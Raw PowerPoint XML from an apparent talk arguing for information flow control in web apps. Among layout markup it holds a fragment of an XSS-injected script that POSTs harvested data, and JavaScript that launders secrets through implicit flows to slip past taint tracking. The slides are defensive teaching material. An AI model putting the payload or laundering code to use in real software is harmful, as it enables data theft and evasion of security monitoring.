                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>('POST', '/post');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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("Content-type", "application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>");      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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(data);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});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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/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IFC in practice – the XSS attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel med rundade hörn 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2852223" y="3182363"/>
            <a:ext cx="5790764" cy="28419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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rektangel med rundade hörn 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803356" y="4336165"/>
            <a:ext cx="3709775" cy="312614"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rektangel med rundade hörn 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017413" y="5482123"/>
            <a:ext cx="1982660" cy="312614"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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10" name="Bildobjekt 9" descr="Dialog-stop_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45" y="5531482"/>
            <a:ext cx="263255" cy="263255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Frihandsfigur 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2078276" y="2960486"/>
            <a:ext cx="4692614" cy="288637"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4692614 w 4692614"/>
              <a:gd name="connsiteY0" fmla="*/ 280391 h 288637"/>
              <a:gd name="connsiteX1" fmla="*/ 1740143 w 4692614"/>
              <a:gd name="connsiteY1" fmla="*/ 9 h 288637"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 4692614"/>
              <a:gd name="connsiteY2" fmla="*/ 288637 h 28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2614" h="288637">
                <a:moveTo>
                  <a:pt x="4692614" y="280391"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3607429" y="139513"/>
                  <a:pt x="2522245" y="-1365"/>
                  <a:pt x="1740143" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="958041" y="1383"/>
                  <a:pt x="479020" y="145010"/>
                  <a:pt x="0" y="288637"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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ihandsfigur 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136005" y="3785146"/>
            <a:ext cx="4436954" cy="618488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4436954 w 4436954"/>
              <a:gd name="connsiteY0" fmla="*/ 618488 h 618488"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4436954"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 61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36954" h="618488">
                <a:moveTo>
                  <a:pt x="4436954" y="618488"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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72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innehåll 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1719071"/>
            <a:ext cx="8407893" cy="482865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Taint tracking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Technique for ensuring absence of bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explicit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flows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(direct copying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Simple and relatively cheap</a:t>
            </a:r>
          </a:p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Built </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into several languages 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Perl, Ruby, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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Available as extension for more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Python, Java, JavaScript, …</a:t>
            </a:r>
          </a:p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All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demoed attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>used explicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flows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Is taint tracking enough?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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But, You say, isn’t that taint tracking?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86444" y1="68397" x2="86444" y2="68397"/>
                        <a14:foregroundMark x1="78889" y1="70704" x2="78889" y2="70704"/>
                        <a14:foregroundMark x1="81111" y1="76240" x2="81111" y2="76240"/>
                        <a14:foregroundMark x1="55556" y1="87774" x2="55556" y2="87774"/>
                        <a14:foregroundMark x1="54444" y1="93310" x2="54444" y2="93310"/>
                        <a14:foregroundMark x1="33889" y1="84544" x2="33889" y2="84544"/>
                        <a14:foregroundMark x1="20111" y1="90888" x2="20111" y2="90888"/>
                        <a14:foregroundMark x1="16333" y1="84198" x2="16333" y2="84198"/>
                        <a14:foregroundMark x1="16667" y1="76240" x2="16667" y2="76240"/>
                        <a14:foregroundMark x1="13667" y1="76701" x2="13667" y2="76701"/>
                        <a14:foregroundMark x1="11333" y1="59285" x2="11333" y2="59285"/>
                        <a14:foregroundMark x1="6000" y1="35871" x2="6000" y2="35871"/>
                        <a14:foregroundMark x1="12444" y1="13379" x2="12444" y2="13379"/>
                        <a14:foregroundMark x1="8667" y1="12111" x2="8667" y2="12111"/>
                        <a14:foregroundMark x1="35000" y1="14072" x2="35000" y2="14072"/>
                        <a14:foregroundMark x1="28111" y1="6574" x2="28111" y2="6574"/>
                        <a14:foregroundMark x1="56778" y1="22837" x2="56778" y2="22837"/>
                        <a14:foregroundMark x1="56778" y1="20069" x2="56778" y2="20069"/>
                        <a14:foregroundMark x1="56778" y1="16494" x2="56778" y2="16494"/>
                        <a14:foregroundMark x1="75778" y1="21223" x2="75778" y2="21223"/>
                        <a14:foregroundMark x1="79667" y1="36678" x2="79667" y2="36678"/>
                        <a14:foregroundMark x1="84222" y1="35871" x2="84222" y2="35871"/>
                        <a14:foregroundMark x1="88000" y1="31603" x2="88000" y2="31603"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1001" t="1056" r="-1001" b="-1056"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5916449" y="3448082"/>
            <a:ext cx="2845811" cy="274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10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innehåll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Taint tracking is not enough when the attacker is in control of the code as is the case with injection attacks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Consider implicit flows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Boolean value of secret is copied into public – but no explicit copying. Naturally works on bits too.</a:t>
            </a:r>
          </a:p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taint tracking enough?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719011" y="3043970"/>
            <a:ext cx="5744638" cy="646331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public = false; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>if (secret) { public = true; }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" name="Rektangel 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719011" y="4843751"/>
            <a:ext cx="5744638" cy="147732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function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copybit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b) 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var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x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0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;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 if (b) { x = 1; }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 return x;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98405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innehåll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81216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Implicit flows can easily be lifted to laundering arbitrary secrets if allowed, consider scaling up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copybit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to bytes.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  <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Each bit is shifted into position and copied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This code would bypass taint tracking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thankfully, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tracks implicit flows too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No time to demo this time but I’m happy to give anyone interested an offline demo :D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Laundering – the need for full IFC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rektangel 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793235" y="2453114"/>
            <a:ext cx="5744638" cy="230832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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>copybits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="16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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> &lt; n; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16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  <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>copybit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(c &amp; 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    c &gt;&gt;= 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    x |= b &lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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rgbClr val="FFFFFF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1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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7226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IFC and the injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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517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8698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Current protection mechanism created in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response to existing attacks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different and targeted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do typically no protect against other attacks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Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control not enough to protect confidentiality of user data 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Accidental information disclosure doe to, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, mistakes in program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Active code injection attacks frequently possible </a:t>
            </a:r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Taint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tracking not enough in the presence of code injection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Easily bypassed by using implicit flows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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to take home</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bildobjekt 3" descr="house-309113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860" y="1711000"/>
            <a:ext cx="1710813" cy="161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89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869887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IFC offers a uniform way to stop code injection attacks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malicious or broken 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party code – the ad example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broken code that enables XSS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(malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or compromised 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party – the  analytics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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IFC does not require the user to trust 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parties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would also have stopped the S-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pankki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> accidental leak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IFC not created in response to attacks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general and powerful idea</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ttacks stopped by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preventing unwanted information flows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Code is still injected and allowed access to information, but not allowed to disclose secrets like the password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Execution stopped with a security error on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attempt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to take home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547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82142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The presented attacks are not so much a symptom of ‘bad practices’ or ‘sloppy coding’ as they are symptoms of woefully lacking security mechanisms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It should be fine for S-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pankki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to include Google Analytics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without doing a security audit of the (rapidly changing) code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It should be fine to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modernizr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, …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without necessarily trusting the code or their providers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The freedom to use available libraries is one cornerstone of the exciting and rapid development of cloud apps and cloud services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… but we need to get the security mechanism up to speed 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in particular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, we need to be able to specify what information can go where and find a way of enforcing this</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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personal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30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End-to-end security in a client server setting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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bigger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758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Bildobjekt 17" descr="cloud-icon-png-cloud-10.png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573" y="1024934"/>
            <a:ext cx="5977828" cy="597782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cloud and the WEB app</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="textruta 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897358" y="1978331"/>
            <a:ext cx="74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SaaS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Bildobjekt 6" descr="imgres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324" y="2658275"/>
            <a:ext cx="800354" cy="800354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="textruta 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3424628" y="1939082"/>
            <a:ext cx="101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party</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Rak 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
